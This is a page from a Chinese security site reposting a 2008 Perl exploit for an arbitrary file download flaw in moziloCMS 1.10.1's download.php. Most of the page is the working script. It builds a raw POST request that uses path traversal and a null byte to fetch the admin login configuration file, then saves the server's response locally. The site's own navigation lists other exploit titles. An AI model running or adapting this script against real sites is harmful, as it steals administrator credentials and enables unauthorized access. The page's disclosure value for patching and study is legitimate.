首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit 来源：ax330d [doggy] gmail [dot] com 作者：Ams 发布时间：2008-08-04   #!/usr/bin/perl # # moziloCMS 1.10.1 Perl exploit # # discovered & written by Ams # ax330d [doggy] gmail [dot] com # # DESCRIPTION: # Vulnerability hides in "download.php", which we can use to download any file we want to. # Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open # not looking on that it is protected by .htaccess) # Script does not filters global params, it only checks whether local file exists... # (By the way, all downloads are logged to "/conf/downloads.conf") # # USAGE: # Run exploit :perl expl.pl http://www.site.com # # NEEDED: # magic_quotes_gpc = off # use strict; use IO::Socket; print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n\t\t moziloCMS 1.10.1 exploit (by Ams) \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; if(@ARGV<1){ die "\n\tUsage:\texpl.pl [host]\n\n \n\tExample:\texpl.pl http://localhost/blog/\n\n"; } my $expl_url = $ARGV[0]; print "\n\t[~] Starting exploit...\n"; if($expl_url =~ m#http://#) { exploit($expl_url); } else { exploit('http://'.$expl_url); } sub exploit { # Defining vars. my $site = pop @_; my ($a, $b, $c, @d) = split /\//,$site; my $path = join('/',@d); my $host = $c; if($path) {$path = '/'.$path;} my ($length, $packet, $downloaded, $injection); # Revealing /data/sess.php. print "\n\t[~] Sending request to 'downloads.php'...\n"; $injection = "file=hola&cat=../admin/conf/logindata.conf%00"; $length = length($injection); $packet = "POST $path/download.php HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: $length\r\n\r\n"; $packet .= "$injection"; $downloaded = send_surprise($host, $packet, 1); if($downloaded =~ /hackin/) { print "\n\t[-] Exploiting failed...\n"; } elsif ($downloaded =~ /200 OK/) { # Parsing and saving received data. $downloaded =~ /\r\n\r\n/ ; $downloaded = $'; open(DOWNL, ">hola.txt"); print DOWNL $downloaded; close(DOWNL); print "\n\t[+] Looks like ok! Check hola.txt\n"; } else { print "\n\t[-] Exploiting failed...\n"; } } sub send_surprise() { my $dat = 1; my ($host, $packet, $ret) = @_; my $socket=IO::Socket::INET->new( Proto=>"tcp", PeerAddr=>$host, PeerPort=>"80" ); if( ! $socket) { return 0; } else { print $socket $packet; if($ret) { my $rcv; while($rcv = <$socket>) { $dat .= $rcv; } } close ($socket); return $dat; } }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Coppermine Photo Gallery <= 1. ·IntelliTamper 2.07 (imgsrc) Re ·Symphony <= 1.7.01 (non-patche ·Xerox Phaser 8400 (reboot) Rem ·NCTsoft AudFile.dll ActiveX Co ·BIND 9.x Remote DNS Cache Pois ·Pligg <= 9.9.0 Remote Code Exe ·TGS CMS 0.3.2r2 Remote Code Ex ·eNdonesia 8.4 (Calendar Module ·Joomla Component EZ Store Remo ·HIOX Browser Statistics 2.0 Ar ·HIOX Random Ad 1.3 Arbitrary A   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved